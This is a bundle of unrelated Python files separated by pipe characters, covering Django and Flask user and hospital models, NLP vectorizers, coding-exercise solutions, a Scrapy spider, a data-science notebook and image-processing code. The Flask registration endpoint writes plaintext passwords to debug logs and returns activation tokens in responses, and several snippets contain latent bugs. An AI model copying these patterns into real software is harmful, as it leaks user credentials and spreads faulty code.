dieta = models.CharField(max_length=10, choices = dieta_choices)
dieta_objetosc = models.CharField(max_length=4)
woda_objetosc = models.CharField(max_length=4)
glasgow = models.PositiveSmallIntegerField()
class Meta:
verbose_name_plural = "Zlecenia żywienia"
class Wypis(PeriodBase):
tryb_choices = (('Zakończenie procesu terapeutycznego lub diagnostycznego', 'Zakończenie procesu terapeutycznego lub diagnostycznego'),
('Skierowanie do dalszego leczenia w lecznictwie ambulatoryjnym','Skierowanie do dalszego leczenia w lecznictwie ambulatoryjnym'),
('Skierowanie do dalszego leczenia w innym szpitalu','Skierowanie do dalszego leczenia w innym szpitalu'),
('Wypisanie na własne żądanie','Wypisanie na własne żądanie'),
('Osoba leczona samowolnie opuściła ZOL','Osoba leczona samowolnie opuściła ZOL'),
('Wypisanie na podstawie art. 221 pkt 3 ustawy o ZOZ','Wypisanie na podstawie art. 221 pkt 3 ustawy o ZOZ'),
('Zgon pacjenta','Zgon pacjenta'),
('Osoba leczona, która samowolnie opuściła podmiot leczniczy','Osoba leczona, która samowolnie opuściła podmiot leczniczy'),
('Koniec pobytu','Koniec pobytu')
)
miejsce_wypisu = models.CharField(max_length=100, blank=True)
przyczyna_wypisu = models.TextField(blank=True)
tryb = models.CharField(max_length=100, choices=tryb_choices)
class Meta:
verbose_name_plural = "Wypisy"
class Przepustka(PeriodBase):
tresc = models.TextField(blank=True)
class Meta:
verbose_name_plural = "Przepustki"
class Rozliczany(models.Model):
class Meta:
abstract = True
pacjent = models.OneToOneField(Pacjent, on_delete = models.CASCADE, primary_key = True)
dni_2 = models.PositiveSmallIntegerField(null = True, blank = True)
dni_6 = models.PositiveSmallIntegerField(null = True, blank = True)
dni_7 = models.PositiveSmallIntegerField(null = True, blank = True)
dni_wypis =models.PositiveSmallIntegerField(null = True, blank = True)
dni_przepustka =models.PositiveSmallIntegerField(null = True, blank = True)
zgon_data = models.DateField(null = True, blank = True)
przyjecie_data = models.DateField(null = True, blank = True)
wypisy = []
przepustki =[]
zywienie_6 = []
zywienie_7 = []
|
import os
import re
import gensim
import pickle
from nltk.corpus import stopwords, wordnet
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
from datetime import datetime
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from sklearn.feature_extraction.text import CountVectorizer, HashingVectorizer, TfidfVectorizer
from sklearn.decomposition import TruncatedSVD
class Vectorizer_():
def __init__(self, path_to_dataset):
self.path_to_dataset = path_to_dataset #путь к папке Yelp dataset на компьютере ЧЕРЕЗ \\
self.lemmatizer = WordNetLemmatizer()
self.stop_words = stopwords.words('english')
self.corpus = [path_to_dataset+'\\negative', path_to_dataset+'\\positive']
self.all_docs = {}
self.d2v_corpus = [TaggedDocument(doc, [i]) for i, doc in enumerate([v for v in self.all_docs.values()][0:601])]
def space_division(self, text: str):
wrong = re.findall("[a-z0-9A-Z][!?.:][A-Za-z]", text)
corr = []
for c in [list(el) for el in wrong]:
c.insert(2, ' ')
corr.append(c)
crc = [''.join(it) for it in corr]
for n in range(len(crc)):
text = text.replace(wrong[n], crc[n])
return text
def space_inserting(self, text: str):
fal = re.findall("[a-z][A-Z]", text)
tru = []
for c in [list(el) for el in fal]:
c.insert(1," ")
tru.append(c)
tr = [''.join(e) for e in tru]
for n in range(len(tr)):
text = text.replace(fal[n], tr[n])
return text
def filter_punct_and_numbers(self, text: str):
not_needed = set(re.findall("[^A-Za-z\s'-]", text))
for sym in not_needed:
text = text.replace(sym, ' ').lower()
for sp in re.findall("\s{2,}", text):
text = text.replace(sp, " ")
return text
def filter_stop_words(self, text: str):
text = text.split(" ")
text = list(filter(lambda x: x not in stop_words, text))
return text
def filter_empties_and_dashes(self, text):
text = list(filter(lambda x: x not in stop_words and x != '' and x != '-' and x != '--', text))
for i in range(len(text)):
if re.match('^-[a-z]+$', text[i]) or re.match('^[a-z]+-$', text[i]):
text[i] = text[i].replace('-', '')
return text
def final_preprocess(self, text):
tag_dict = {"J": wordnet.ADJ,
"N": wordnet.NOUN,
"V": wordnet.VERB,
"R": wordnet.ADV}
text = " ".join(text)
text = [word for word in word_tokenize(text) if word not in stop_words and not re.match("[a-z]?'[a-z]", word)]
fin_text = []
for c in pos_tag(text):
if c[1][0].upper() in tag_dict.keys():
fin_text.append(self.lemmatizer.lemmatize(c[0], tag_dict[c[1][0].upper()]))
else:
fin_text.append(c[0])
return fin_text
def preprocess(self, text):
text = self.space_division(text)
text = self.space_inserting(text)
text = self.filter_punct_and_numbers(text)
text = self.filter_stop_words(text)
text = self.filter_empties_and_dashes(text)
text = self.final_preprocess(text)
return text
def fill_dictionary(self):
for c in self.corpus:
for i in range(len(os.listdir(c))):
self.all_docs[os.listdir(c)[i]] = self.preprocess(open(c + '\\' + os.listdir(c)[i], 'r', encoding='utf-8').read())
def doc2vec_dm_vectorize(self):
doc2vec_dm_vectorized = {}
start = datetime.now()
my_dm = gensim.models.doc2vec.Doc2Vec(dm=1, vector_size=100, min_count=1, epochs=10)
my_dm.build_vocab(self.d2v_corpus)
my_dm.train(self.d2v_corpus, total_examples=my_dm.corpus_count, epochs=my_dm.epochs)
for k in self.all_docs.keys():
doc2vec_dm_vectorized[k] = my_dm.infer_vector(self.all_docs[k])
finish = datetime.now()
print("Doc2Vec_DM working time:", (finish-start).seconds)
with open('doc2vec_dm.pickle', 'wb') as file:
pickle.dump(doc2vec_dm_vectorized, file)
def doc2vec_dbow_vectorize(self):
doc2vec_dbow_vectorized = {}
start = datetime.now()
my_dbow = gensim.models.doc2vec.Doc2Vec(dm=0, vector_size=100, min_count=1, epochs=10)
my_dbow.build_vocab(self.d2v_corpus)
my_dbow.train(self.d2v_corpus, total_examples=my_dbow.corpus_count, epochs=my_dbow.epochs)
for k in self.all_docs.keys():
doc2vec_dbow_vectorized[k] = my_dbow.infer_vector(self.all_docs[k])
finish = datetime.now()
print("Doc2Vec_DBOW working time:", (finish - start).seconds)
with open('doc2vec_dbow.pickle', 'wb') as f:
pickle.dump(doc2vec_dbow_vectorized, f)
def hashing_vectorize(self):
hash_vectorized = {}
work_corp = [" ".join(v) for v in self.all_docs.values()]
start = datetime.now()
vectorizer = HashingVectorizer(ngram_range=(1, 3), n_features=100000)
svd = TruncatedSVD(n_components=100)
hv = svd.fit_transform(vectorizer.fit_transform(work_corp).toarray())
key_list = [k for k in self.all_docs.keys()]
for i in range(len(key_list)):
hash_vectorized[key_list[i]] = hv[i]
finish = datetime.now()
print("HashingVectorizer working time:", (finish - start).seconds)
with open('hashing.pickle', 'wb') as file:
pickle.dump(hash_vectorized, file)
def tfidf_vectorize(self):
tfidf_vectorized = {}
work_corp = [" ".join(v) for v in self.all_docs.values()]
start = datetime.now()
vectorizer = TfidfVectorizer(ngram_range=(1, 3))
vs = vectorizer.fit_transform(work_corp)
matr = vs.toarray()
key_list = [k for k in self.all_docs.keys()]
for i in range(len(key_list)):
tfidf_vectorized[key_list[i]] = matr[i]
finish = datetime.now()
print("TfidfVectorizer working time:", (finish - start).seconds)
with open('tf_idf.pickle', 'wb') as file:
pickle.dump(tfidf_vectorized, file)
def tfidf_lsa_vectorize(self):
tfidf_lsa_vectorized = {}
with open('tf_idf.pickle', 'rb') as file:
tfidfs = pickle.load(file)
matrix = [v for v in tfidfs.values()]
key_list = [k for k in tfidfs.keys()]
start = datetime.now()
svd = TruncatedSVD(n_components=100)
lsa = svd.fit_transform(matrix)
for i in range(len(key_list)):
tfidf_lsa_vectorized[key_list[i]] = lsa[i]
finish = datetime.now()
print("Tf-Idf dimensionality reduction time:", (finish - start).seconds)
with open('tfidf_lsa.pickle', 'wb') as f:
pickle.dump(tfidf_lsa_vectorized, f)
def count_lsa_vectorize(self):
count_lsa_vectorized = {}
key_list = [k for k in self.all_docs.keys()]
corp_to_work = [" ".join(v) for v in self.all_docs.values()]
start = datetime.now()
vectorizer = CountVectorizer(ngram_range=(1, 3))
arr = vectorizer.fit_transform(corp_to_work).toarray()
svd = TruncatedSVD(n_components=100)
lsa = svd.fit_transform(arr)
for i in range(len(key_list)):
count_lsa_vectorized[key_list[i]] = lsa[i]
finish = datetime.now()
print("LSA vectorizer working time:", (finish - start).seconds)
with open('count_lsa.pickle', 'wb') as file:
pickle.dump(count_lsa_vectorized, file)
|
from datetime import datetime
from django.contrib.auth.models import AbstractUser
from django.db import models
class User(AbstractUser):
password = models.CharField(max_length=100,
blank=True,
null=True)
bio = models.CharField(max_length=200,
null=True,
blank=True)
email = models.EmailField(max_length=100,
unique=True,
null=False)
username = models.CharField(max_length=100,
unique=True,
blank=True,
null=False,
default=email)
ROLE_CHOICES = (
('user', 'user'),
('moderator', 'moderator'),
('admin', 'admin')
)
role = models.CharField(max_length=20,
choices=ROLE_CHOICES,
default="user")
confirmation_code = models.CharField(max_length=8,
null=True,
blank=True)
data_confirmation_code = models.DateTimeField(
null=False,
blank=False,
default=datetime.now())
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
|
"""
URLIFY (CCI 1.3)
Write a method to replace all spaces in a string with '%20'. You may assume that the string has sufficient space at
the end to hold the additional characters, and that you are given the "true" length of the string.
NOTE: If implementing in Java, please use a character array so that you can perform this operation in place.
Example:
Input = "Mr John Smith ", 13
Output = "Mr%20John%20Smith"
NOTE: This question isn't really aimed at Python; normally, you'd work from back to front moving a single char at a
time, while replacing spaces with '%20'.
"""
def urlify(string : str, l = None):
return string.strip(" ").replace(" ", "%20")
print(urlify("Mr John Smith "))
|
# coding: utf-8
# In[65]:
import pandas as pd
from sklearn.metrics import roc_auc_score, auc,roc_curve
import numpy as np
import xgboost as xgb
import matplotlib.pyplot as plt
import seaborn as sns
from statsmodels.stats.outliers_influence import variance_inflation_factor
from category_encoders import *
#i=1
# In[3]:
train = pd.read_csv("train.csv")
test = pd.read_csv("test.csv")
# In[4]:
train.head()
# In[5]:
test.head()
# In[12]:
train.plot(x='age', y='stroke', kind ='scatter')
# In[13]:
train[train['stroke']==1]['ever_married'].value_counts().sort_index().head(100).plot.bar()
# In[14]:
train[train['stroke']==0]['ever_married'].value_counts().sort_index().head(100).plot.bar()
# In[15]:
train[train['stroke']==1]['gender'].value_counts().sort_index().head(100).plot.bar()
# In[16]:
train[train['stroke']==0]['gender'].value_counts().sort_index().head(100).plot.bar()
# In[18]:
train[train['stroke']==0]['heart_disease'].value_counts().sort_index().head(100).plot.bar()
# In[19]:
train[train['stroke']==1]['heart_disease'].value_counts().sort_index().head(100).plot.bar()
# In[20]:
train[train['stroke']==1]['work_type'].value_counts().sort_index().head(100).plot.bar()
# In[21]:
train[train['stroke']==0]['work_type'].value_counts().sort_index().head(100).plot.bar()
# In[23]:
train[train['stroke']==0]['Residence_type'].value_counts().sort_index().head(100).plot.bar()
# In[24]:
train[train['stroke']==1]['Residence_type'].value_counts().sort_index().head(100).plot.bar()
# In[25]:
pd.scatter_matrix(train[['age','hypertension','avg_glucose_level','bmi','stroke']])
# In[26]:
pd.scatter_matrix(test[['age','hypertension','avg_glucose_level','bmi']])
# In[29]:
train.groupby('age')['stroke'].mean().plot()
# In[40]:
age_gender_stroke = train.groupby(['age','gender'], as_index = False)['stroke'].mean()
# In[41]:
age_gender_stroke.head()
# In[42]:
sns.factorplot(x='age', y='stroke', hue='gender', data=age_gender_stroke, fit_reg=False)
plt.show()
# In[43]:
sns.lmplot(x='age', y='stroke', hue='gender', data=age_gender_stroke.dropna(), fit_reg=False)
plt.show()
# In[31]:
train['hypertension'].value_counts()
# In[64]:
train_test = train.append(test)
# # statmodels VIF
# In[60]:
#variance_inflation_factor(exog, exog_idx)
#One recommendation is that if VIF is greater than 5, then the explanatory variable given by exog_idx is highly collinear with the other explanatory variables, and the parameter estimates will have large standard errors because of this
df = train[['age','avg_glucose_level','bmi']].dropna()
pd.Series([variance_inflation_factor(df.values, i) for i in range(df.shape[1])], index=df.columns)
# # target encoding
# In[79]:
X = train.iloc[:,train.columns != 'stroke']
y = train['stroke']
enc = BinaryEncoder(cols=['hypertension','heart_disease','gender','ever_married','work_type','Residence_type','smoking_status']).fit(X, y)
numeric_dataset_train = enc.transform(X)
numeric_dataset_test = enc.transform(test)
train_test_use = numeric_dataset_train.append(numeric_dataset_test) #if you want to use target encoding, uncomment this
train_test_use['stroke'] = list(train['stroke'].values) + [np.nan for i in range(len(test))]
# # OR
# # One hot encoding
# In[30]:
train_test_use = pd.concat([train_test[['age','hypertension','heart_disease','avg_glucose_level','bmi','stroke']],pd.get_dummies(train_test[['gender','ever_married','work_type','Residence_type','smoking_status']])], axis=1)
# # Modeling
# In[102]:
X_train_all=train_test_use[0:len(train.index)]
X_test=train_test_use[len(train.index):len(train_test_use.index)]
X_train_all.columns = [str(i) for i in X_train_all.columns]
X_test.columns = [str(i) for i in X_test.columns]
features=list(X_train_all.columns)
features.remove('stroke')
X_train=X_train_all.sample(frac=0.80, replace=False)
X_valid=pd.concat([X_train_all, X_train]).drop_duplicates(keep=False)
dtrain = xgb.DMatrix(X_train[features],X_train['stroke'] , missing=np.nan)
dvalid = xgb.DMatrix(X_valid[features],missing=np.nan)
dtest = xgb.DMatrix(X_test[features], missing=np.nan)
# In[103]:
nrounds = 35
watchlist = [(dtrain, 'train')]
params = {"objective": "binary:logistic","booster": "gbtree", "nthread": 4, "silent": 1,
"eta": 0.087, "gamma":0.008, "max_depth": 6, "max_delta_step":0, "subsample": 0.9, "colsample_bytree": 0.7,
"min_child_weight": 1, "sketch_eps":.02, "seed": 2016, "tree_method": "exact", "normalize_type":"tree", "eval_metric":"auc"}
bst = xgb.train(params, dtrain, num_boost_round=nrounds, evals=watchlist, verbose_eval=200)
# In[104]:
valid_preds = bst.predict(dvalid)
test_preds = bst.predict(dtest)
roc_auc_score(X_valid['stroke'], valid_preds)
# In[105]:
test_preds.shape
# In[ ]:
0.872698043358836#nround=35, eta=.087, max_depth=6, sub_sample=0.9, min_child_weight=1, "gamma":0.008, "sketch_eps":.02,
# In[106]:
sub = pd.DataFrame({'id':test['id'],'stroke':test_preds})
sub[['id','stroke']].to_csv('sub_'+str(i)+'.csv', index = False)
i = i+1
# In[107]:
sub['stroke'].max()
|
"""
Leetcode Problem 007: Reverse Integer
Author: Richard Coucoules
Solved: 2019-12-04
"""
class Solution:
def reverse(self, x):
intStr = str(x)
negative = True if intStr[0] == '-' else False
if negative:
memStr = intStr[1:]
else:
memStr = intStr
revIntStr = memStr[::-1]
if negative:
revIntStr = '-' + revIntStr
revInt = int(revIntStr)
if (revInt > 2**31 - 1 or revInt < -(2**31)):
return 0
return revInt
def main():
sol = Solution()
print(sol.reverse(123)) # Expect 321
print(sol.reverse(-123)) # Expect -321
print(sol.reverse(120)) # Expect 21
if __name__ == "__main__":
main()
|
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class Resource(object):
"""This base class defines the interface used for compute resource
plugins. It is not necessary to use this base class, but all compute
resource plugins must implement the abstract methods found here.
An instance of the plugin object is instantiated when it is loaded
by calling __init__() with no parameters.
"""
@abc.abstractmethod
def reset(self, resources, driver):
"""Set the resource to an initial state based on the resource
view discovered from the hypervisor.
"""
pass
@abc.abstractmethod
def test(self, usage, limits):
"""Test to see if we have sufficient resources to allocate for
an instance with the given resource usage.
:param usage: the resource usage of the instances
:param limits: limits to apply
:returns: None if the test passes or a string describing the reason
why the test failed
"""
pass
@abc.abstractmethod
def add_instance(self, usage):
"""Update resource information adding allocation according to the
given resource usage.
:param usage: the resource usage of the instance being added
:returns: None
"""
pass
@abc.abstractmethod
def remove_instance(self, usage):
"""Update resource information removing allocation according to the
given resource usage.
:param usage: the resource usage of the instance being removed
:returns: None
"""
pass
@abc.abstractmethod
def write(self, resources):
"""Write resource data to populate resources.
:param resources: the resources data to be populated
:returns: None
"""
pass
@abc.abstractmethod
def report_free(self):
"""Log free resources.
This method logs how much free resource is held by
the resource plugin.
:returns: None
"""
pass
|
# Michael Gennery
# DVD Database
# August 2020
# Create Table
import sqlite3
DVD_DB = sqlite3.connect('DVD_DB.db')
DVD_cursor = DVD_DB.cursor()
DVD_fields = """
create table DVD
(
barcode int, -- Barcode
name varchar, -- Name of Film
cert varchar, -- Certification
genre_1 varchar, -- Type of film
genre_2 varchar, -- Sub Type
actor_1 varchar, -- Main Actor
actor_2 varchar, -- Supporting Actor
director varchar, -- Director
company varchar, -- Production Company
run_time int, -- Running Time in minutes
year int -- Year of release
)
"""
DVD_cursor.execute(DVD_fields)
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(response):
return render(response, "dashboard/dshindex.html", {})
def pjDetails(response):
return render(response, "dashboard/projectDetails.html", {}) |
from repository import *
import heapq
class Controller:
def __init__(self, repository):
self.__repository = repository
def iteration(self, args):
# args - list of parameters needed to run one iteration
population = args[0]
m = args[1]
starting_node = args[2]
population.evaluate(m, starting_node)
# a iteration:
# selection of the parents
# randomly
i1 = randint(0, population.getPopulationSize() - 1)
i2 = randint(0, population.getPopulationSize() - 1)
parent1 = population.getIndividuals()[i1]
parent2 = population.getIndividuals()[i2]
# create offsprings by crossover of the parents
if parent1 != parent2:
offspring1, offspring2 = parent1.crossover(parent2)
# apply some mutations
offspring1.mutate()
offspring2.mutate()
# selection of the survivors
offspring1.fitness(m, starting_node)
offspring2.fitness(m, starting_node)
best = [parent1, parent2, offspring1, offspring2]
best = sorted(best, reverse=True)
# pop the ones with the best fitness and put them in population
population.getIndividuals()[i1] = best[0]
population.getIndividuals()[i2] = best[1]
return population
def run(self, args):
# args - list of parameters needed in order to run the algorithm
# args = [population, noOfIterations, map, starting_node]
population = args[0]
noOfIterations = args[1]
for _ in range(noOfIterations):
population = self.iteration([population, args[2], args[3]])
result = population.selection(population.getPopulationSize())
return result
# until stop condition
# perform an iteration
# save the information need it for the statistics
# return the results and the info for statistics
def solver(self, args):
# args - list of parameters needed in order to run the solver
# args = [population_size, individual_size, noOfIterations, map, starting_node]
# create the population,
population = self.__repository.createPopulation([args[0], args[1]])
# run the algorithm
result = self.run([population, args[2], args[3], args[4]])
return result
# TODO return the results and the statistics
|
import pytest
@pytest.fixture
def samples():
return (
'''
“교육청 현장에서 다 하는 말이 현재 인력 구조에선 다른 감사를 줄이지 않는 한 사립유치원 감사에 비중을 두는 건 어렵지 않으냐고 얘기한다.”(한 교육청 관계자)
“현 인력으론 유치원을 포함해 도내 학교를 모두 감사하려면 10년이 걸린다.”(다른 교육청 관계자)
교육부가 내년도 상반기까지 대규모 유치원 등을 대상으로 종합감사를 예고한 가운데 서울시교육청만 하더라도 감사인력이 불과 4명밖에 되지 않는 등 현장 인력이 턱없이 부족한 것으로 21일 나타났다. 전국 시·도교육청 대부분이 유치원 전담 감사인력이 없는 탓에 감사인력 확대 등 보완 대책이 뒤따라야 한다는 목소리가 나온다.
■ “6명이 1100여개 유치원 감사”
이날 <한겨레>가 국회 교육위원회 소속 박용진 더불어민주당 의원을 통해 전국 17개 시·도교육청 중 13곳의 감사인력 자료를 받아 분석한 결과 평균 37.6명의 직원이 근무하고 있었다. 경기(85명)가 가장 많았고, 경남(52명), 부산(49명), 서울·전북(48명), 충남(34명), 충북(32명), 전남(31명), 대전(28명), 강원(27명), 울산(21명), 광주(20명), 세종(14명) 차례였다. 하지만 이 인원은 유치원뿐 아니라 초·중·고등학교 감사, 공무원 비위 등에 대한 사실조사를 담당하는 각 교육청 감사인력 전체를 집계한 것이다.
따라서 사립유치원 감사인력은 크게 줄어든다. 대부분의 교육청은 사립유치원 감사 담당을 따로 두지 않는다. 민원이 들어오면 감사인력 일부가 조사를 나가는 식이다. 서울시교육청의 경우 교육부가 지난 18일 ‘유치원 비리신고센터’를 꾸리기로 하자 전담팀을 만들었지만 인원이 팀장을 포함해 4명이다. 서울의 사립유치원은 650개(2018년 5월1일 기준)다. 서울시교육청 관계자는 “그동안 사립유치원 감사는 사안이 있거나 특별한 경우가 없으면 하지 못했다. 이제 급히 하려고 하니까 인력이 부족하다”며 “나쁘게 보면 졸속이라고 볼 수 있지만 일단 사립유치원 감사에 나름 최선을 다하려고 한다”고 토로했다. 경기도교육청은 감사5팀(6명)이 사립유치원 특정감사 업무를 전담해왔다. 경기도교육청 관계자는 “시민감사팀에서도 도와주지만 거긴 악성 민원도 처리해야 한다. 도내 사립유치원이 1100개가 넘는데 감사팀 6명으론 종합감사에 어려움이 있다”고 했다. 부산시교육청도 그동안 민원이 들어오면 4명이 팀을 꾸려 사실조사를 나가는 정도였다.
■ “‘배 째라’ 감사 방해도 많아”
이들이 적은 감사인력의 고충을 토로하는 이유는 사립유치원의 경우 회계서류를 제대로 갖추지 않아 들여다봐야 할 것이 많은데다, 유치원들이 ‘비협조‘로 대응하기 때문이다. 부산시교육청 관계자는 “사립유치원 조사를 하다 보면 서류가 미비되어 있거나 사람도 자주 바뀐다”며 “진행하는 과정이 너무 고되다”고 호소했다.
특히 이 관계자는 “행정처분으로 징계를 줘도 파면이 아니면 계속 유치원을 운영할 수 있고, 경고·주의 등의 경징계는 실효성이 없다는 생각이 들었다”며 “그러다 보니 유치원들이 ‘배 째라’ 태도로 감사를 방해하는 경우가 많다”고 했다. 경남도교육청 관계자도 “규정상 종합감사 주기가 3년이지만 감사인력이 적고 기관 수는 많다 보니 6년에 한번씩 돌아가고 있다. 도내 유치원부터 고등학교까지 감사기관이 1689개”라며 “우리가 1년에 할 수 있는 감사는 평균 120개 내외다. 도내 기관을 다 하려면 10년 정도 걸린다고 보면 된다”고 했다. 그는 “현장 감사의 어려움이 큰 만큼 인력 확대가 시급하다. 이는 전국 시·도가 안고 있는 문제”라고 강조했다.
박용진 의원은 “유치원을 대상으로 한 현행 특정감사에서 종합감사로 바꾸려면 감사인력 구조도 대폭 개선해야 한다”며 “제대로 된 유치원 비위 근절을 위해서는 국무총리 주관의 범정부 태스크포스(TF) 구성도 필수적”이라고 말했다. 서영지 기자 yj@hani.co.kr
''' # NOQA
,)
|
from flask import jsonify, request, current_app
from marshmallow import ValidationError
from flask_jwt_extended import jwt_required, current_user
from flask_jwt_extended import create_access_token, set_access_cookies
from userlogin.api.v1 import V1FlaskView
from userlogin.blueprints.user.models import User
from userlogin.blueprints.user.schemas import (
registration_schema,
users_schema,
user_schema,
user_query_schema,
user_update_schema,
user_schema_detailed,
users_schema_detailed
)
# XXX: Ideally, I should move this function to some lib/util module.
def match_current_user(username):
"""
Utility function to match given name with current (logged in)
user. Both username and email are matched.
:param username: Username to match
:return: True if matches the current logged in user.
"""
if current_user is not None and \
(current_user.username == username or \
current_user.email == username):
return True
return False
class UsersView(V1FlaskView):
def post(self):
json_data = request.get_json()
current_app.logger.debug('Got data: {0}'.format(json_data))
if not json_data:
response = jsonify({'error': 'Invalid input'})
return response, 400
try:
data = registration_schema.load(json_data)
current_app.logger.debug(type(data))
current_app.logger.debug(data)
except ValidationError as err:
response = {
'error': err.messages
}
return jsonify(response), 422
user = User()
user.email = data.get('email')
user.username = data.get('username')
user.password = User.encrypt_pass(data.get('password'))
user.save()
activate_token = User.initiate_activation(user)
data.update({'message' : "Please check your email for activating the account"})
data.update({'token' : activate_token})
return jsonify(data), 200
# The jwt required here ensures that only the user having the valid
# token presented to them earlier will have access to this endpoint.
# This is the functionality we get from the framework. Which would
# mean that non-logged in users can't even get here. Rest of the
# Permission checking logic should be in the endpoint.
@jwt_required
def get(self):
json_data = request.get_json()
current_app.logger.debug('Gotts data: {0}'.format(json_data))
current_app.logger.debug('current user: {0}'.format(current_user.username))
current_app.logger.debug('Request: {0}'.format(request))
# Try to get the username from the request.
username = None
try:
data = user_query_schema.load(json_data)
username = data['username']
detailed = data['detailed']
current_app.logger.debug('fetching {0} info for {1}'.\
format('detailed' if detailed else 'short',
username))
except Exception as eall:
current_app.logger.debug('Failed to load query schema: {0}'.format(eall))
return jsonify({'error' : 'Malformed requet'}), 400
current_app.logger.debug('Query for username {0}, current_user: {1}'
', admin: {2}'.format(
username,
current_user.username,
current_user.is_admin()))
if username is not None and username != 'all' and \
(username == current_user.username or current_user.is_admin()):
# Good request from current user self or admin for
# a given user
user = User.find_user(username)
if user is not None:
current_app.logger.debug('User: {0}'.format(user))
if user.active:
if detailed:
response = {'data': user_schema_detailed.dump(user)}
else:
response = {'data': user_schema.dump(user)}
else:
response = {'error' : 'user is not active.'}
else:
response = {'error' : 'Failed to find user'}
elif current_user.is_admin():
## Good request, give specific user or all users.
users = User.query.all()
if detailed:
response = {'data' : users_schema_detailed.dump(users)}
else:
response = {'data' : users_schema.dump(users)}
else:
response = {
'error': 'Invalid request. Not authorized.'
}
return jsonify(response), 401
return response, 200
# The jwt required here ensures that only the user having the valid
# token presented to them earlier will have access to this endpoint.
# This is the functionality we get from the framework. Which would
# mean that non-logged in users can't even get here. Rest of the
# Permission checking logic should be in the endpoint.
@jwt_required
def delete(self):
json_data = request.get_json()
# Try to get the username from the request.
try:
current_app.logger.debug('Trying to get username from request: {0}'.format(request))
username = request.args.get('username', default=None, type=str)
current_app.logger.debug('Got username {0}'.format(username))
if username is None:
raise(AttributeError)
except AttributeError as e:
current_app.logger.debug('Failed to get username from request: {0}'.format(e))
username = user_query_schema.load(json_data)['username']
current_app.logger.debug('Got username {0}'.format(username))
except Exception as eall:
current_app.logger.debug('Failed to load query schema: {0}'.format(eall))
username = None
if username is not None and \
(match_current_user(username) or current_user.is_admin()):
# Good request from current user self or admin for
# a given user
user = User.find_user(username)
# Won't let admins account be deleted (this should be fixed
# further. It's not like we don't want to delete admins role
# but we just don't want the last admin to be deleted in most
# cases. Otherwise admin deletion should actually be OK.)
if user is not None and not user.is_admin():
user.delete()
return jsonify({'message' : 'User deleted successfully'}), 200
else:
return jsonify({'error' : 'failed to find user'}), 404
else:
return jsonify({'error' : 'All user delete not supported'}), 400
# The jwt required here ensures that only the user having the valid
# token presented to them earlier will have access to this endpoint.
# This is the functionality we get from the framework. Which would
# mean that non-logged in users can't even get here. Rest of the
# Permission checking logic should be in the endpoint.
@jwt_required
def patch(self):
json_data = request.get_json()
current_app.logger.debug('Got data: {0}'.format(json_data))
current_app.logger.debug('type(current user): {0}'.format(type(current_user)))
current_app.logger.debug('current user: {0}'.format(current_user))
# Try to get the username from the request.
try:
current_app.logger.debug('Trying to get username from request: {0}'.format(request))
data = user_update_schema.load(json_data)
username = data['username']
new_username = data['new_username']
current_app.logger.debug('Got username: {0}, new_username: {1}'.format(username, new_username))
except Exception as eall:
current_app.logger.debug('Failed to load query schema: {0}'.format(eall))
username = None
if username is not None and match_current_user(username):
# Good request from current user self or admin for
# a given user
user = User.find_user(username)
if user is not None:
if user.active:
user.update_username(new_username)
current_app.logger.debug('Updated successfully! {0}'.format(user))
return jsonify({'data': user_schema.dump(user)}), 200
else:
return jsonify({'error' : 'User is not active. Please activate'}), 401
else:
return jsonify({'error' : 'failed to find user'}), 404
else:
return jsonify({'error' : 'Invalid input'}), 422
|
def test1():
print("test1 inform")
return 0
def test2():
print("test2 inform")
return {"zhangsan":'lisi',"wangwu":"zhaoliu"}
x=test1()
y=test2()
print(x)
print(y)
|
import scrapy
import re
from scrapy.loader import ItemLoader
from scrapy.loader.processors import TakeFirst
from ..items import MarchfelderebankItem
pattern = r'(\r)?(\n)?(\t)?(\xa0)?'
class SpiderSpider(scrapy.Spider):
name = 'spider'
start_urls = ['https://www.marchfelderbank.at/private/news']
def parse(self, response):
links = response.xpath('//h3/a/@href').getall()
yield from response.follow_all(links, self.parse_article)
def parse_article(self, response):
item = ItemLoader(MarchfelderebankItem())
item.default_output_processor = TakeFirst()
title = response.xpath('//h1//text()').get()
content = response.xpath('//ul[@class="block_list"]//text()').getall()
content = ' '.join([text.strip() for text in content if text.strip()][:-1])
item.add_value('title', title)
item.add_value('link', response.url)
item.add_value('content', content)
return item.load_item()
|
import io
import numpy as np
from skimage.filters import threshold_otsu
#import skimage.measure
from scipy.ndimage.morphology import (
binary_erosion,
binary_closing,
binary_dilation,
)
from scipy.ndimage.filters import median_filter
from scipy.ndimage.measurements import label
from stacktools import save_stack, load_stack_from_path
def bytes_to_int(bytes):
value = 0
for n, b in enumerate(bytes):
value += ord(b) << (n * 8)
return value
def fix_signed_stack(input_stack):
"""Deal with the problem of stacks with a signed integer value that probably
shouldn't have them."""
return np.maximum(input_stack, 0)
def calculate_box_bounds(center, radius):
"""Given a center position in 3D space and a radius, return the bounds of
the box containing a sphere centered at that point with the given
radius."""
xc, yc, zc = center
z1 = zc - radius
z2 = zc + radius
x1 = xc - radius
x2 = xc + radius
y1 = yc - radius
y2 = yc + radius
return x1, x2, y1, y2, z1, z2
def find_section_of_isq_file(isq_filename, center, radius):
"""Return section from isq_filename as numpy array, centered at the given
location and with the given radius."""
x1, x2, y1, y2, z1, z2 = calculate_box_bounds(center, radius)
ct_array = read_isq_z_range(isq_filename, z1, z2)
smaller = ct_array[x1:x2,y1:y2,:]
fixed_stack = fix_signed_stack(smaller)
return fixed_stack
def extract_single_seed_stack(isq_filename, center, radius):
"""Return stack representing a single seed from the ISQ file isq_filename,
centered at center with the given radius."""
# xian_section = find_section_of_isq_file(isq_filename, center, radius)
# save_stack('xian_section', xian_section)
xian_section = load_stack_from_path('output/xian_section.stack')
tval = threshold_otsu(xian_section)
thresholded_stack = xian_section > tval
#save_stack('xian_thresh', thresholded_stack)
median_stack = median_filter(thresholded_stack, size=5)
save_stack('xian_median', median_stack)
